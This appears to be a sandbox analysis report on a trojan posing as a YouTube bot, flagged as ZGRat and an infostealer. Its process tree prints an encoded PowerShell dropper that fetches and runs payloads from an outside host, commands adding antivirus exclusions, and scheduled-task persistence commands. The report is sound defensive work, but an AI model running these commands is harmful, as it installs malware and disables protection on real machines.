Overview

overview

10

Static

static

1

YT_Bot.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-05-2024 15:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    YT_Bot.exe

  • Size

    2.4MB

  • MD5

    04f2679bb77721b9130be049bf9d37b8

  • SHA1

    5ab36346e37971cf53850faf964442b6330f9451

  • SHA256

    4f9ea4d924204eed91a7b78dd1ea384507277ae18aaa247e8aa076eb5ea22cb8

  • SHA512

    cf1e0e4504d59d867d80d41065b7f206b7928aae81d76ad681762a70fbd441a9f2d239a0ef9ef581c6736ddcd4878952a09382b4d2f494aaed654538e0d5c8cc

  • SSDEEP

    49152:CXjWphUswawH27MSJ7WZ4agjZbaHKgJZ6dEhBlbSkfzPs2sHAiinn:Q6HUdawH27hWZ4agtbsZ6+hBoJ2sHAi2

Score
10/10
zgratexecutionratspywarestealer

Malware Config

Signatures

  • Detect ZGRat V1 3 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe
    "C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAbABqACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagB0AGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBoAGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB6AHQAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAHAAZABiACcALAAgADwAIwBqAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AegB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAbABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFkAbwB1AHQAdQBiAGUALQBWAGkAZQB3AGUAcgBzAC4AcABkAGIAJwApACkAPAAjAGYAagBkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAHgAbQBsACcALAAgADwAIwBiAHQAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAbABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAegBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AeABtAGwAJwApACkAPAAjAGUAdwBxACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAGQAbABsACcALAAgADwAIwBhAGsAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AdQB3ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAcQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AZABsAGwAJwApACkAPAAjAHMAZwBhACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlAC4AYwBvAG4AZgBpAGcAJwAsACAAPAAjAHYAeAB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAawB2AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbgBnAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAuAGMAbwBuAGYAaQBnACcAKQApADwAIwB6AGMAaQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwBsAC8AWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACwAIAA8ACMAbQBkAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHcAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGYAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQApADwAIwBqAG0AcAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcALAAgADwAIwBmAHgAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AcQBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAcQBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApACkAPAAjAHUAYQBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHMAbgByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBmAGYAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQA8ACMAYQBqAGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBhAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAcAB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApADwAIwBmAGUAYQAjAD4A"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3624
      • C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe
        "C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:4112
      • C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe
        "C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:2548
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ChainReview\OBg87LaDbDWQsMY7IUT23EbHgKkyJlfFMrfs5jJR.vbe"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4168
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\ChainReview\EG6ATP28z0IboPcWhHfEXGTe81jh.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3352
            • C:\ChainReview\ythyperRuntimedhcpSvc.exe
              "C:\ChainReview/ythyperRuntimedhcpSvc.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:404
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Ease of Access Themes\SearchApp.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:1228
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\msedge.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:1724
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\en-US\RuntimeBroker.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2336
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\TextInputHost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:4924
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\winlogon.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2060
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\k0OYDjyvqU.bat"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:3156
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  8⤵
                    PID:3772
                  • C:\Windows\system32\PING.EXE
                    ping -n 10 localhost
                    8⤵
                    • Runs ping.exe
                    PID:4912
                  • C:\Users\Default\Saved Games\winlogon.exe
                    "C:\Users\Default\Saved Games\winlogon.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1128
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,15140928051103392835,1612840580898364401,262144 --variations-seed-version --mojo-platform-channel-handle=4336 /prefetch:8
      1⤵
        PID:4864
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Windows\Resources\Ease of Access Themes\SearchApp.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2476
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Resources\Ease of Access Themes\SearchApp.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:4884
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 10 /tr "'C:\Windows\Resources\Ease of Access Themes\SearchApp.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2160
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3304
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3404
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3196
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\RuntimeBroker.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:4088
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2796
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:4048
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 12 /tr "'C:\ChainReview\TextInputHost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1892
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\ChainReview\TextInputHost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1604
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\ChainReview\TextInputHost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2944
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Saved Games\winlogon.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1000
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\winlogon.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2468
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Saved Games\winlogon.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:4280

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ChainReview\EG6ATP28z0IboPcWhHfEXGTe81jh.bat
        Filesize

        90B

        MD5

        aa06dc21b6978c477a7f34b896dad471

        SHA1

        4b5f6bf59b40d386d741c9ba8bbd1c75b96e9d4c

        SHA256

        fc79f5fbfb63f69e761164ec2f0e180e9c601d9f1c7679c8b09a811bc954ac5b

        SHA512

        b502d2024f97aba1006440a3bd97c8b5578bf072d383e643471ff0737dafa9cd087ef8f1110dd517ca10342894d8b03c0393bf5aebd646a9a9d4f44a5326c86c

        Download Submit

      • C:\ChainReview\OBg87LaDbDWQsMY7IUT23EbHgKkyJlfFMrfs5jJR.vbe
        Filesize

        217B

        MD5

        7b648db3dc8ebc6a5cd3a2f558dfe4de

        SHA1

        473ba67dce6b02a315ad1b7f3c7681139cf66bf3

        SHA256

        3d6edd167d26d72d3fa13028da5f7e7971dd1dc5c228cfa58f68dbbb8203f548

        SHA512

        01f3eaf4b996add5ec3840f8f336968272f4fc321348fd2d306923951d783a28ab867b179083670e5b755f1ef7110316b16f3851410d57ce955adb8c819abbf3

        Download Submit

      • C:\ChainReview\ythyperRuntimedhcpSvc.exe
        Filesize

        2.0MB

        MD5

        9a6a6606ac872363a585b773f71d8f80

        SHA1

        62ea36005c549612d2402ab5d04f236ceca5f879

        SHA256

        d647eff6ef8a4eb95d66b2d86907b873e68199a5ad59ce091c9eefe9b26f9485

        SHA512

        616953d5386084eb926a445266e061c662a65ac64929085fdd237ee2bfeb19ee1fb879c84dbe11bd382c9f1f4aa54811736ffba6ff28aa6f2ef96cec41c9b038

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        19KB

        MD5

        2b373d672718c8c3d7e5cef04beccf2c

        SHA1

        d27442667d60c1b10832e0f602523581abf906a8

        SHA256

        7c8205211a32f154994ed53f15c88dc2070d7360df06f7d71764a8e98772e205

        SHA512

        77f4b6a819342d620b0994e5e9d9886081d6ae5996b2a749e73d158a3b3417ce269716a1a736e08a764da935eeb6abc1c58ea1a235f815e738c8c553bd92fd9d

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        948B

        MD5

        a7ce8cefc3f798abe5abd683d0ef26dd

        SHA1

        b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

        SHA256

        5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

        SHA512

        c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Leaf.xNet.dll
        Filesize

        129KB

        MD5

        ea87f37e78fb9af4bf805f6e958f68f4

        SHA1

        89662fed195d7b9d65ab7ba8605a3cd953f2b06a

        SHA256

        de9aea105f31f3541cbc5c460b0160d0689a2872d80748ca1456e6e223f0a4aa

        SHA512

        c56bd03142258c6dcb712d1352d2548a055fbb726ee200949d847cb2d23d9c52442b1435be0df0bf355701a2c1a3c47cd05b96972501f457d2d401501d33d83a

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe
        Filesize

        33KB

        MD5

        a7878575f2e9f431c354c17a3e768fd9

        SHA1

        1824b6cb94120af47a0540af88bfc51435a4c20d

        SHA256

        375552e53a0c25aa36cd66827b97f7576177d1fa81efd978a55b2ec93a5b5fdd

        SHA512

        4f9de23fc13f414c8d6c82a7cd9ef5dfa2e7855ba642b745f62ad8b4af8dccd9269b4dec5468632af0ff5353b0d4c8e85f758ea794469f355f762cb1cc747019

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe.config
        Filesize

        184B

        MD5

        cc46a0995713ba7cb577b4bbbedf83e8

        SHA1

        6cc50a0e444e33f65d42423195ed045a3a55daf8

        SHA256

        5fe1ad802f68d7c47dbbd8e60162ba88abaed162da5d381c85d3e4935311962e

        SHA512

        36f5b3acbc520504cfe56e5fe19de2a22ae3d2ddddb4c0eb3e441f884033077fb411e69976c3e250c3ef01189d0e48016bde67a73a0dbc950dd5d8ec7783fd2a

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xyhfeqif.otv.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\k0OYDjyvqU.bat
        Filesize

        169B

        MD5

        3c0e9afb95e2928eff825c3562f98087

        SHA1

        1bad3af08e666445c5362b1e9fa9489349d23521

        SHA256

        d5e8bd1bea16e62e286aaf7288bfe5d2aecf50e37c275a009899785e56c5f3ad

        SHA512

        ad127d2f20e73be64781942e1505f3fbe0bfe246bdebd12d0f1ec77cfec458dd42e88f8170a50193c86150eaeb90deb46e62243e455a8f74f91cc1005bab0259

        Download Submit

      • C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe
        Filesize

        2.3MB

        MD5

        e99c78add813e602c300b492534ec0f7

        SHA1

        6fda2be6b06481e4284c6d38edc301d3a52d5a46

        SHA256

        fd58d5efc6e9d179c8419a154ecbdff007171e44ac1076bb075d50d208807d9e

        SHA512

        1dbe6f226aa2f0bd2f59852387a7ffacfbc18a3fb5fa5debe5106d1f91b5bde042bb070ccd34a471a56542ee76f16ac781dcc569999008ae81c5f8e2ffe65b9e

        Download Submit

      • memory/404-98-0x0000000000C40000-0x0000000000C4E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/404-96-0x0000000000360000-0x0000000000566000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/404-111-0x0000000002700000-0x000000000270E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/404-105-0x0000000000C50000-0x0000000000C5E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/404-103-0x00000000026D0000-0x00000000026E8000-memory.dmp

        Filesize

        96KB

        Download

      • memory/404-101-0x0000000002750000-0x00000000027A0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/404-107-0x0000000002690000-0x000000000269E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/404-109-0x00000000026A0000-0x00000000026AC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/404-100-0x00000000026B0000-0x00000000026CC000-memory.dmp

        Filesize

        112KB

        Download

      • memory/404-113-0x0000000002710000-0x000000000271C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2336-129-0x000001E97FDB0000-0x000001E97FDD2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2840-3-0x000000007FA70000-0x000000007FE41000-memory.dmp

        Filesize

        3.8MB

        Download

      • memory/2840-2-0x0000000000400000-0x0000000000DDC000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2840-1-0x000000007FA70000-0x000000007FE41000-memory.dmp

        Filesize

        3.8MB

        Download

      • memory/2840-0-0x0000000000400000-0x0000000000DDC000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/3624-22-0x00000000063E0000-0x00000000063FE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3624-39-0x0000000074780000-0x0000000074F30000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3624-46-0x0000000007960000-0x0000000007974000-memory.dmp

        Filesize

        80KB

        Download

      • memory/3624-47-0x00000000079A0000-0x00000000079BA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/3624-48-0x0000000007990000-0x0000000007998000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3624-49-0x0000000007AB0000-0x0000000007AD2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3624-50-0x0000000008990000-0x0000000008F34000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3624-44-0x0000000007910000-0x0000000007921000-memory.dmp

        Filesize

        68KB

        Download

      • memory/3624-43-0x00000000079E0000-0x0000000007A76000-memory.dmp

        Filesize

        600KB

        Download

      • memory/3624-42-0x0000000007790000-0x000000000779A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3624-76-0x0000000074780000-0x0000000074F30000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3624-41-0x0000000007720000-0x000000000773A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/3624-4-0x000000007478E000-0x000000007478F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3624-5-0x0000000004DB0000-0x0000000004DE6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/3624-40-0x0000000007D60000-0x00000000083DA000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/3624-45-0x0000000007950000-0x000000000795E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/3624-38-0x0000000074780000-0x0000000074F30000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3624-37-0x00000000075D0000-0x0000000007673000-memory.dmp

        Filesize

        652KB

        Download

      • memory/3624-36-0x0000000006A00000-0x0000000006A1E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3624-25-0x00000000705A0000-0x00000000705EC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3624-32-0x0000000074780000-0x0000000074F30000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3624-24-0x00000000069C0000-0x00000000069F2000-memory.dmp

        Filesize

        200KB

        Download

      • memory/3624-23-0x0000000006410000-0x000000000645C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3624-21-0x0000000005D60000-0x00000000060B4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/3624-11-0x0000000005CF0000-0x0000000005D56000-memory.dmp

        Filesize

        408KB

        Download

      • memory/3624-10-0x0000000005C80000-0x0000000005CE6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/3624-9-0x00000000053A0000-0x00000000053C2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3624-8-0x0000000074780000-0x0000000074F30000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3624-6-0x0000000005460000-0x0000000005A88000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/3624-7-0x0000000074780000-0x0000000074F30000-memory.dmp

        Filesize

